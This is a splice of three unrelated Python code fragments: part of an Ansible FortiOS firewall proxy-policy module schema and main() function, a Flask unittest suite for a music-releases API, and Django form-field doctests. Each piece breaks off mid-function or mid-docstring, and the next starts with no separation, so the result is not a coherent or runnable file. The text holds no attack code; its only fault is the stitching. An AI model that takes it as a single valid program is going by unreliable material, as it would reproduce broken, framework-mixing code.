"v6.2.7": True,
"v6.0.11": True
}
},
"webcache": {
"type": "string",
"options": [
{
"value": "enable",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "disable",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
],
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"replacemsg_override_group": {
"type": "string",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"profile_protocol_options": {
"type": "string",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"logtraffic": {
"type": "string",
"options": [
{
"value": "all",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "utm",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "disable",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
],
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
},
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
def main():
module_spec = schema_to_module_spec(versioned_schema)
mkeyname = 'policyid'
fields = {
"access_token": {"required": False, "type": "str", "no_log": True},
"enable_log": {"required": False, "type": bool},
"vdom": {"required": False, "type": "str", "default": "root"},
"member_path": {"required": False, "type": "str"},
"member_state": {
"type": "str",
"required": False,
"choices": ["present", "absent"]
},
"state": {"required": True, "type": "str",
"choices": ["present", "absent"]},
"firewall_proxy_policy": {
"required": False, "type": "dict", "default": None,
"options": {
}
}
}
for attribute_name in module_spec['options']:
fields["firewall_proxy_policy"]['options'][attribute_name] = module_spec['options'][attribute_name]
if mkeyname and mkeyname == attribute_name:
fields["firewall_proxy_policy"]['options'][attribute_name]['required'] = True
check_legacy_fortiosapi()
module = AnsibleModule(argument_spec=fields,
supports_check_mode=True)
versions_check_result = None
if module._socket_path:
connection = Connection(module._socket_path)
if 'access_token' in module.params:
connection.set_option('access_token', module.params['access_token'])
if 'enable_log' in module.params:
connection.set_option('enable_log', module.params['enable_log'])
else:
connection.set_option('enable_log', False)
fos = FortiOSHandler(connection, module, mkeyname)
versions_check_result = check_schema_versioning(fos, versioned_schema, "firewall_proxy_policy")
import json
import unittest
from flask_caching import Cache
from sqlalchemy import asc
from app import app, db
from apps.releases.models import (
Releases,
ReleaseFormats,
ReleasesFormatsMapping,
ReleaseCategories,
ReleasesCategoriesMapping,
ReleasesReports
)
from apps.releases.patches import patch_mapping
from apps.people.models import People, ReleasesPeopleMapping
from apps.songs.models import Songs, ReleasesSongsMapping
from apps.users.models import Users, UsersAccessTokens, UsersAccessMapping, UsersAccessLevels
from apps.utils.time import get_datetime, get_datetime_one_hour_ahead, get_datetime_one_month_ago
class TestReleases(unittest.TestCase):
"""Terms used in the tests.
CFPS:
C = Categories (Full length, Live, Demo, etc)
F = Formats (CD, CD-R, Digital, etc)
P = People (who plays what on the album)
S = Songs (foreign key IDs)
"""
def setUp(self):
# Clear redis cache completely
cache = Cache()
cache.init_app(app, config={"CACHE_TYPE": "RedisCache"})
with app.app_context():
cache.clear()
self.app = app.test_client()
# Add two test releases
release = Releases(
Title="UnitTest",
Date=get_datetime_one_month_ago(),
Artist="UnitTest Arts",
Credits="UnitTest is a good and fun activity",
Created=get_datetime_one_month_ago(),
ReleaseCode="TEST001"
)
release2 = Releases(
Title="UnitTest 2",
Date=get_datetime(),
Artist="UnitTest 2 Arts",
Credits="UnitTest too is good for testing",
Created=get_datetime(),
ReleaseCode="TEST002"
)
db.session.add(release)
db.session.add(release2)
# Flush, so we can use the insert ID below
db.session.flush()
self.release_ids = []
self.release_ids.append(release.ReleaseID)
self.release_ids.append(release2.ReleaseID)
# Add categories and mapping for the releases
cats = ReleaseCategories(
ReleaseCategory="UnitTest Category"
)
cats2 = ReleaseCategories(
ReleaseCategory="UnitTest Category 2"
)
cats3 = ReleaseCategories(
ReleaseCategory="UnitTest Category 3"
)
db.session.add(cats)
db.session.add(cats2)
db.session.add(cats3)
db.session.flush()
self.valid_cats = []
self.valid_cats.append(cats.ReleaseCategoryID)
self.valid_cats.append(cats2.ReleaseCategoryID)
self.valid_cats.append(cats3.ReleaseCategoryID)
cat_map = ReleasesCategoriesMapping(
ReleaseID=release.ReleaseID,
ReleaseCategoryID=cats.ReleaseCategoryID,
)
cat_map2 = ReleasesCategoriesMapping(
ReleaseID=release2.ReleaseID,
ReleaseCategoryID=cats.ReleaseCategoryID,
)
db.session.add(cat_map)
db.session.add(cat_map2)
# Add formats and mapping for the release
format_cd = ReleaseFormats(
Title="CD"
)
format_digital = ReleaseFormats(
Title="Digital"
)
db.session.add(format_cd)
db.session.add(format_digital)
db.session.flush()
# For patch testing
format1 = ReleaseFormats(
Title="UnitTest Format One"
)
format2 = ReleaseFormats(
Title="UnitTest Format Two"
)
db.session.add(format1)
db.session.add(format2)
db.session.flush()
self.valid_formats = []
self.valid_formats.append(format1.ReleaseFormatID)
self.valid_formats.append(format2.ReleaseFormatID)
format_mapping = ReleasesFormatsMapping(
ReleaseFormatID=format_cd.ReleaseFormatID,
ReleaseID=release.ReleaseID,
)
format_mapping2 = ReleasesFormatsMapping(
ReleaseFormatID=format_cd.ReleaseFormatID,
ReleaseID=release2.ReleaseID,
)
db.session.add(format_mapping)
db.session.add(format_mapping2)
# Add people and mapping for the release. For some reason, this sometimes is not deleted
        # by tearDown. XXX: Not sure why, so we just check whether it exists and reuse it.
person = People.query.filter_by(Name="UnitTester").first()
if not person:
person = People(
Name="UnitTester"
)
db.session.add(person)
db.session.flush()
# For testing patching:
person1 = People(
Name="UnitTest Person One"
)
person2 = People(
Name="UnitTest Person Two"
)
db.session.add(person1)
db.session.add(person2)
db.session.flush()
self.valid_people = []
self.valid_people.append(person1.PersonID)
self.valid_people.append(person2.PersonID)
person_map = ReleasesPeopleMapping(
ReleaseID=release.ReleaseID,
PersonID=person.PersonID,
Instruments="UnitTesting with Guitars",
)
person_map2 = ReleasesPeopleMapping(
ReleaseID=release2.ReleaseID,
PersonID=person.PersonID,
Instruments="UnitTesting with Extra spice",
)
db.session.add(person_map)
db.session.add(person_map2)
# Add songs for the release
song1 = Songs(
Title="UnitTest One",
Duration=66,
)
song2 = Songs(
Title="UnitTest Two",
Duration=120,
)
song3 = Songs(
Title="UnitTest Three",
Duration=123,
)
# And some patch songs
song_p1 = Songs(
Title="UnitTest Patch One",
Duration=59,
)
song_p2 = Songs(
Title="UnitTest Patch Two",
Duration=161,
)
db.session.add(song1)
db.session.add(song2)
db.session.add(song3)
db.session.add(song_p1)
db.session.add(song_p2)
db.session.flush()
self.valid_songs = []
self.valid_songs.append(song_p1.SongID)
self.valid_songs.append(song_p2.SongID)
release_map1 = ReleasesSongsMapping(
ReleaseID=release.ReleaseID,
SongID=song1.SongID,
ReleaseSongDuration=66,
)
release_map2 = ReleasesSongsMapping(
ReleaseID=release.ReleaseID,
SongID=song2.SongID,
ReleaseSongDuration=120,
)
release_map3 = ReleasesSongsMapping(
ReleaseID=release.ReleaseID,
SongID=song3.SongID,
ReleaseSongDuration=123,
)
# It's fine to have the same songs in another release too (could be a live album)
release2_map1 = ReleasesSongsMapping(
ReleaseID=release2.ReleaseID,
SongID=song1.SongID,
ReleaseSongDuration=66,
)
release2_map2 = ReleasesSongsMapping(
ReleaseID=release2.ReleaseID,
SongID=song2.SongID,
ReleaseSongDuration=120,
)
release2_map3 = ReleasesSongsMapping(
ReleaseID=release2.ReleaseID,
SongID=song3.SongID,
ReleaseSongDuration=123,
)
db.session.add(release_map1)
db.session.add(release_map2)
db.session.add(release_map3)
db.session.add(release2_map1)
db.session.add(release2_map2)
db.session.add(release2_map3)
# Phew! Let's commit
db.session.commit()
# We also need a valid admin user for the add release endpoint test.
user = Users(
Name="UnitTest Admin",
Username="unittest",
Password="password"
)
db.session.add(user)
db.session.commit()
# This is non-standard, but is fine for testing.
self.access_token = "unittest-access-token"
user_token = UsersAccessTokens(
UserID=user.UserID,
AccessToken=self.access_token,
ExpirationDate=get_datetime_one_hour_ahead()
)
db.session.add(user_token)
db.session.commit()
# Define level for admin
if not UsersAccessLevels.query.filter_by(LevelName="Admin").first():
access_level = UsersAccessLevels(
UsersAccessLevelID=4,
LevelName="Admin"
)
db.session.add(access_level)
db.session.commit()
grant_admin = UsersAccessMapping(
UserID=user.UserID,
UsersAccessLevelID=4
)
db.session.add(grant_admin)
db.session.commit()
self.user_id = user.UserID
# Add two studio reports for the first release
report1 = ReleasesReports(
ReleaseID=self.release_ids[0],
Report="UnitTest\r\n\r\nReport\r\nData",
Author="UnitTest Author",
ReportDate=get_datetime(),
Created=get_datetime()
)
report2 = ReleasesReports(
ReleaseID=self.release_ids[0],
Report="UnitTest\r\n\r\nReport2\r\nData2",
Author="UnitTest Author",
ReportDate=get_datetime(),
Created=get_datetime()
)
db.session.add(report1)
db.session.add(report2)
db.session.commit()
def tearDown(self):
# This will delete all the mappings too, via ondelete cascade
releases = Releases.query.filter(Releases.Title.like("UnitTest%")).all()
for release in releases:
db.session.delete(release)
db.session.commit()
# But the CFPS need to be deleted separately
cats = ReleaseCategories.query.filter(
ReleaseCategories.ReleaseCategory.like("UnitTest%")).all()
for cat in cats:
db.session.delete(cat)
db.session.commit()
formats = ReleaseFormats.query.all()
for f in formats:
db.session.delete(f)
db.session.commit()
people = People.query.filter(People.Name.like("UnitTest%")).all()
for person in people:
db.session.delete(person)
db.session.commit()
songs = Songs.query.filter(Songs.Title.like("UnitTest%")).all()
for song in songs:
db.session.delete(song)
db.session.commit()
user = Users.query.filter_by(UserID=self.user_id).first()
db.session.delete(user)
db.session.commit()
def test_getting_one_release(self):
"""This should return all the details of a single release, including the CFPS"""
response = self.app.get("/api/1.0/releases/{}".format(self.release_ids[0]))
release = json.loads(
response.get_data().decode()
)
self.assertEqual(200, response.status_code)
self.assertFalse(release is None)
self.assertEqual("UnitTest Arts", release["releases"][0]["artist"])
self.assertEqual("UnitTest is a good and fun activity", release["releases"][0]["credits"])
self.assertEqual(1, len(release["releases"][0]["categories"]))
self.assertEqual(1, len(release["releases"][0]["formats"]))
self.assertEqual(1, len(release["releases"][0]["people"]))
self.assertEqual(3, len(release["releases"][0]["songs"]))
# SongID is used for lyrics and tabs
self.assertTrue("id" in release["releases"][0]["songs"][0])
self.assertTrue(type(int(release["releases"][0]["songs"][0]["id"])) == int)
def test_getting_all_releases(self):
"""Should return all the releases and all their details, including CFPS, in reverse
chronological order (newest release first)"""
response = self.app.get("/api/1.0/releases/")
releases = json.loads(
response.get_data().decode()
)
self.assertEqual(200, response.status_code)
self.assertEqual(2, len(releases["releases"]))
self.assertEqual("UnitTest 2", releases["releases"][0]["title"])
self.assertEqual("UnitTest", releases["releases"][1]["title"])
self.assertEqual(1, len(releases["releases"][0]["categories"]))
self.assertEqual(1, len(releases["releases"][0]["formats"]))
self.assertEqual(1, len(releases["releases"][0]["people"]))
self.assertEqual(3, len(releases["releases"][0]["songs"]))
self.assertEqual(1, len(releases["releases"][1]["categories"]))
self.assertEqual(1, len(releases["releases"][1]["formats"]))
self.assertEqual(1, len(releases["releases"][1]["people"]))
self.assertEqual(3, len(releases["releases"][1]["songs"]))
# SongID is used for lyrics and tabs
self.assertTrue("id" in releases["releases"][0]["songs"][0])
self.assertTrue(type(int(releases["releases"][0]["songs"][0]["id"])) == int)
self.assertTrue("id" in releases["releases"][1]["songs"][0])
self.assertTrue(type(int(releases["releases"][1]["songs"][0]["id"])) == int)
def test_adding_a_release(self):
"""Should insert the release and all it's related data.
NB: This endpoint requires a valid admin token in the request header. We create one in
setUp() for this test."""
response = self.app.post(
"/api/1.0/releases/",
data=json.dumps(
dict(
title="UnitTest Title",
releaseCode="TEST001",
releaseDate=get_datetime(),
artist="UnitTest Artist",
credits="UnitTest Credits",
categories=["UnitTest Category"],
formats=["UnitTest Format"],
people=[{"UnitTest Person": "UnitTest Guitar"}],
songs=[{"UnitTest Song 1": 85}],
)
),
content_type="application/json",
headers={
'User': self.user_id,
'Authorization': self.access_token
}
)
release = Releases.query.filter_by(Title="UnitTest Title").first_or_404()
cats = ReleasesCategoriesMapping.query.filter_by(ReleaseID=release.ReleaseID).order_by(
asc(ReleasesCategoriesMapping.ReleaseCategoryID)).all()
formats = ReleasesFormatsMapping.query.filter_by(ReleaseID=release.ReleaseID).order_by(
asc(ReleasesFormatsMapping.ReleaseFormatID)).all()
people = ReleasesPeopleMapping.query.filter_by(ReleaseID=release.ReleaseID).order_by(
asc(ReleasesPeopleMapping.ReleasesPeopleMappingID)).all()
songs = ReleasesSongsMapping.query.filter_by(ReleaseID=release.ReleaseID).order_by(
asc(ReleasesSongsMapping.ReleasesSongsMappingID)).all()
self.assertEqual(201, response.status_code)
self.assertTrue("Location" in response.get_data().decode())
self.assertEqual("UnitTest Title", release.Title)
# These are tested more thoroughly in their own unit tests, so just a simple check here
self.assertEqual(1, len(cats))
self.assertEqual(
"UnitTest Category",
ReleaseCategories.query.filter_by(
ReleaseCategoryID=cats[0].ReleaseCategoryID
).first().ReleaseCategory
)
self.assertEqual(1, len(formats))
self.assertEqual(
"UnitTest Format",
ReleaseFormats.query.filter_by(
ReleaseFormatID=formats[0].ReleaseFormatID
).first().Title
)
self.assertEqual(1, len(people))
self.assertEqual(
"UnitTest Person",
People.query.filter_by(PersonID=people[0].PersonID).first().Name
)
self.assertEqual(1, len(songs))
self.assertEqual(
"UnitTest Song 1",
Songs.query.filter_by(SongID=songs[0].SongID).first().Title
)
def test_updating_release(self):
"""Using PUT will replace the entire release dataset with the new values defined in the
JSON of the request. All previous values and mapping should be cleared and only the new
ones will remain."""
response = self.app.put(
"/api/1.0/releases/{}".format(int(self.release_ids[0])),
data=json.dumps(
dict(
title="UnitTest Title Put",
releaseCode="TEST001",
releaseDate=get_datetime(),
artist="UnitTest Artist Put",
credits="UnitTest Credits Put",
categories=["UnitTest Category Put"],
formats=["UnitTest Format Put"],
people=[{"UnitTest Person": "UnitTest Guitar Put"}],
songs=[{"UnitTest Song 1": 89}],
)
),
content_type="application/json",
headers={
'User': self.user_id,
'Authorization': self.access_token
}
)
release = Releases.query.get_or_404(self.release_ids[0])
cats = ReleasesCategoriesMapping.query.filter_by(ReleaseID=release.ReleaseID).order_by(
asc(ReleasesCategoriesMapping.ReleaseCategoryID)).all()
formats = ReleasesFormatsMapping.query.filter_by(ReleaseID=release.ReleaseID).order_by(
asc(ReleasesFormatsMapping.ReleaseFormatID)).all()
people = ReleasesPeopleMapping.query.filter_by(ReleaseID=release.ReleaseID).order_by(
asc(ReleasesPeopleMapping.ReleasesPeopleMappingID)).all()
songs = ReleasesSongsMapping.query.filter_by(ReleaseID=release.ReleaseID).order_by(
asc(ReleasesSongsMapping.ReleasesSongsMappingID)).all()
self.assertEqual(200, response.status_code)
self.assertEqual("UnitTest Title Put", release.Title)
self.assertEqual("UnitTest Artist Put", release.Artist)
# Categories
self.assertEqual(1, len(cats))
self.assertEqual(
"UnitTest Category Put",
ReleaseCategories.query.filter_by(
ReleaseCategoryID=cats[0].ReleaseCategoryID
).first().ReleaseCategory
)
# Formats
self.assertEqual(1, len(formats))
self.assertEqual(
"UnitTest Format Put",
ReleaseFormats.query.filter_by(
ReleaseFormatID=formats[0].ReleaseFormatID
).first().Title
)
# People
# NB: Any person created during the initial adding of release will still remain. However,
# the new value in a PUT will be evaluated as usual as either existing, new or invalid.
# The original person will not be deleted by a PUT, but the mapping for this release will
# be cleared and replaced with the new people defined in the JSON.
self.assertEqual(1, len(people))
self.assertEqual(
"UnitTest Guitar Put",
ReleasesPeopleMapping.query.filter_by(
ReleasesPeopleMappingID=people[0].ReleasesPeopleMappingID
).first().Instruments
)
# Songs
# NB: One limitation is that if a Song was first inserted during adding a release and
# the original had a wrong song duration, then you can only update it for the release
# mapping. The original song will still have the wrong duration, and we shouldn't update it
# every time a release is updated, because the time should be release-specific.
# So the only choice is to use the PUT /songs/:id or PATCH /songs/:id endpoint to update
# the original song. Or just fix it manually in the DB :)
self.assertEqual(1, len(songs))
self.assertEqual(
89,
ReleasesSongsMapping.query.filter_by(
ReleasesSongsMappingID=songs[0].ReleasesSongsMappingID
).first().ReleaseSongDuration
)
def test_patch_mapping(self):
"""Because the JSON values can be in different case than the actual DB model, we map them
        """
# -*- coding: utf-8 -*-
tests = r"""
>>> from django.forms import *
>>> from django.forms.widgets import RadioFieldRenderer
>>> from django.core.files.uploadedfile import SimpleUploadedFile
>>> import datetime
>>> import time
>>> import re
>>> try:
... from decimal import Decimal
... except ImportError:
... from django.utils._decimal import Decimal
##########
# Fields #
##########
Each Field class does some sort of validation. Each Field has a clean() method,
which either raises django.forms.ValidationError or returns the "clean"
data -- usually a Unicode object, but, in some rare cases, a list.
Each Field's __init__() takes at least these parameters:
required -- Boolean that specifies whether the field is required.
True by default.
widget -- A Widget class, or instance of a Widget class, that should be
used for this Field when displaying it. Each Field has a default
Widget that it'll use if you don't specify this. In most cases,
the default widget is TextInput.
label -- A verbose name for this field, for use in displaying this field in
a form. By default, Django will use a "pretty" version of the form
field name, if the Field is part of a Form.
initial -- A value to use in this Field's initial display. This value is
*not* used as a fallback if data isn't given.
Other than that, the Field subclasses have class-specific options for
__init__(). For example, CharField has a max_length option.
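For example (an illustrative check, not part of the original suite), initial is
only used for the field's initial display; it is *not* substituted when clean()
receives no data:
>>> f = CharField(initial='Jane')
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']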
# CharField ###################################################################
>>> f = CharField()
>>> f.clean(1)
u'1'
>>> f.clean('hello')
u'hello'
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean([1, 2, 3])
u'[1, 2, 3]'
>>> f = CharField(required=False)
>>> f.clean(1)
u'1'
>>> f.clean('hello')
u'hello'
>>> f.clean(None)
u''
>>> f.clean('')
u''
>>> f.clean([1, 2, 3])
u'[1, 2, 3]'
CharField accepts an optional max_length parameter:
>>> f = CharField(max_length=10, required=False)
>>> f.clean('12345')
u'12345'
>>> f.clean('1234567890')
u'1234567890'
>>> f.clean('1234567890a')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at most 10 characters (it has 11).']
CharField accepts an optional min_length parameter:
>>> f = CharField(min_length=10, required=False)
>>> f.clean('')
u''
>>> f.clean('12345')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at least 10 characters (it has 5).']
>>> f.clean('1234567890')
u'1234567890'
>>> f.clean('1234567890a')
u'1234567890a'
>>> f = CharField(min_length=10, required=True)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('12345')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at least 10 characters (it has 5).']
>>> f.clean('1234567890')
u'1234567890'
>>> f.clean('1234567890a')
u'1234567890a'
# IntegerField ################################################################
>>> f = IntegerField()
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('1')
1
>>> isinstance(f.clean('1'), int)
True
>>> f.clean('23')
23
>>> f.clean('a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a whole number.']
>>> f.clean(42)
42
>>> f.clean(3.14)
Traceback (most recent call last):
...
ValidationError: [u'Enter a whole number.']
>>> f.clean('1 ')
1
>>> f.clean(' 1')
1
>>> f.clean(' 1 ')
1
>>> f.clean('1a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a whole number.']
>>> f = IntegerField(required=False)
>>> f.clean('')
>>> repr(f.clean(''))
'None'
>>> f.clean(None)
>>> repr(f.clean(None))
'None'
>>> f.clean('1')
1
>>> isinstance(f.clean('1'), int)
True
>>> f.clean('23')
23
>>> f.clean('a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a whole number.']
>>> f.clean('1 ')
1
>>> f.clean(' 1')
1
>>> f.clean(' 1 ')
1
>>> f.clean('1a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a whole number.']
IntegerField accepts an optional max_value parameter:
>>> f = IntegerField(max_value=10)
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(1)
1
>>> f.clean(10)
10
>>> f.clean(11)
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is less than or equal to 10.']
>>> f.clean('10')
10
>>> f.clean('11')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is less than or equal to 10.']
IntegerField accepts an optional min_value parameter:
>>> f = IntegerField(min_value=10)
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(1)
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is greater than or equal to 10.']
>>> f.clean(10)
10
>>> f.clean(11)
11
>>> f.clean('10')
10
>>> f.clean('11')
11
min_value and max_value can be used together:
>>> f = IntegerField(min_value=10, max_value=20)
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(1)
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is greater than or equal to 10.']
>>> f.clean(10)
10
>>> f.clean(11)
11
>>> f.clean('10')
10
>>> f.clean('11')
11
>>> f.clean(20)
20
>>> f.clean(21)
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is less than or equal to 20.']
# FloatField ##################################################################
>>> f = FloatField()
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('1')
1.0
>>> isinstance(f.clean('1'), float)
True
>>> f.clean('23')
23.0
>>> f.clean('3.14')
3.1400000000000001
>>> f.clean(3.14)
3.1400000000000001
>>> f.clean(42)
42.0
>>> f.clean('a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f.clean('1.0 ')
1.0
>>> f.clean(' 1.0')
1.0
>>> f.clean(' 1.0 ')
1.0
>>> f.clean('1.0a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f = FloatField(required=False)
>>> f.clean('')
>>> f.clean(None)
>>> f.clean('1')
1.0
FloatField accepts min_value and max_value just like IntegerField:
>>> f = FloatField(max_value=1.5, min_value=0.5)
>>> f.clean('1.6')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is less than or equal to 1.5.']
>>> f.clean('0.4')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is greater than or equal to 0.5.']
>>> f.clean('1.5')
1.5
>>> f.clean('0.5')
0.5
# DecimalField ################################################################
>>> f = DecimalField(max_digits=4, decimal_places=2)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('1') == Decimal("1")
True
>>> isinstance(f.clean('1'), Decimal)
True
>>> f.clean('23') == Decimal("23")
True
>>> f.clean('3.14') == Decimal("3.14")
True
>>> f.clean(3.14) == Decimal("3.14")
True
>>> f.clean(Decimal('3.14')) == Decimal("3.14")
True
>>> f.clean('NaN')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f.clean('Inf')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f.clean('-Inf')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f.clean('a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f.clean(u'łąść')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f.clean('1.0 ') == Decimal("1.0")
True
>>> f.clean(' 1.0') == Decimal("1.0")
True
>>> f.clean(' 1.0 ') == Decimal("1.0")
True
>>> f.clean('1.0a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f.clean('123.45')
Traceback (most recent call last):
...
ValidationError: [u'Ensure that there are no more than 4 digits in total.']
>>> f.clean('1.234')
Traceback (most recent call last):
...
ValidationError: [u'Ensure that there are no more than 2 decimal places.']
>>> f.clean('123.4')
Traceback (most recent call last):
...
ValidationError: [u'Ensure that there are no more than 2 digits before the decimal point.']
>>> f.clean('-12.34') == Decimal("-12.34")
True
>>> f.clean('-123.45')
Traceback (most recent call last):
...
ValidationError: [u'Ensure that there are no more than 4 digits in total.']
>>> f.clean('-.12') == Decimal("-0.12")
True
>>> f.clean('-00.12') == Decimal("-0.12")
True
>>> f.clean('-000.12') == Decimal("-0.12")
True
>>> f.clean('-000.123')
Traceback (most recent call last):
...
ValidationError: [u'Ensure that there are no more than 2 decimal places.']
>>> f.clean('-000.12345')
Traceback (most recent call last):
...
ValidationError: [u'Ensure that there are no more than 4 digits in total.']
>>> f.clean('--0.12')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f = DecimalField(max_digits=4, decimal_places=2, required=False)
>>> f.clean('')
>>> f.clean(None)
>>> f.clean('1') == Decimal("1")
True
DecimalField accepts min_value and max_value just like IntegerField:
>>> f = DecimalField(max_digits=4, decimal_places=2, max_value=Decimal('1.5'), min_value=Decimal('0.5'))
>>> f.clean('1.6')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is less than or equal to 1.5.']
>>> f.clean('0.4')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is greater than or equal to 0.5.']
>>> f.clean('1.5') == Decimal("1.5")
True
>>> f.clean('0.5') == Decimal("0.5")
True
>>> f.clean('.5') == Decimal("0.5")
True
>>> f.clean('00.50') == Decimal("0.50")
True
>>> f = DecimalField(decimal_places=2)
>>> f.clean('0.00000001')
Traceback (most recent call last):
...
ValidationError: [u'Ensure that there are no more than 2 decimal places.']
>>> f = DecimalField(max_digits=3)
# Leading whole zeros "collapse" to one digit.
>>> f.clean('0000000.10') == Decimal("0.1")
True
# But a leading 0 before the . doesn't count towards max_digits
>>> f.clean('0000000.100') == Decimal("0.100")
True
# Only leading whole zeros "collapse" to one digit.
>>> f.clean('000000.02') == Decimal('0.02')
True
>>> f.clean('000000.0002')
Traceback (most recent call last):
...
ValidationError: [u'Ensure that there are no more than 3 digits in total.']
>>> f.clean('.002') == Decimal("0.002")
True
>>> f = DecimalField(max_digits=2, decimal_places=2)
>>> f.clean('.01') == Decimal(".01")
True
>>> f.clean('1.1')
Traceback (most recent call last):
...
ValidationError: [u'Ensure that there are no more than 0 digits before the decimal point.']
# DateField ###################################################################
>>> import datetime
>>> f = DateField()
>>> f.clean(datetime.date(2006, 10, 25))
datetime.date(2006, 10, 25)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30))
datetime.date(2006, 10, 25)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59))
datetime.date(2006, 10, 25)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59, 200))
datetime.date(2006, 10, 25)
>>> f.clean('2006-10-25')
datetime.date(2006, 10, 25)
>>> f.clean('10/25/2006')
datetime.date(2006, 10, 25)
>>> f.clean('10/25/06')
datetime.date(2006, 10, 25)
>>> f.clean('Oct 25 2006')
datetime.date(2006, 10, 25)
>>> f.clean('October 25 2006')
datetime.date(2006, 10, 25)
>>> f.clean('October 25, 2006')
datetime.date(2006, 10, 25)
>>> f.clean('25 October 2006')
datetime.date(2006, 10, 25)
>>> f.clean('25 October, 2006')
datetime.date(2006, 10, 25)
>>> f.clean('2006-4-31')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
>>> f.clean('200a-10-25')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
>>> f.clean('25/10/06')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
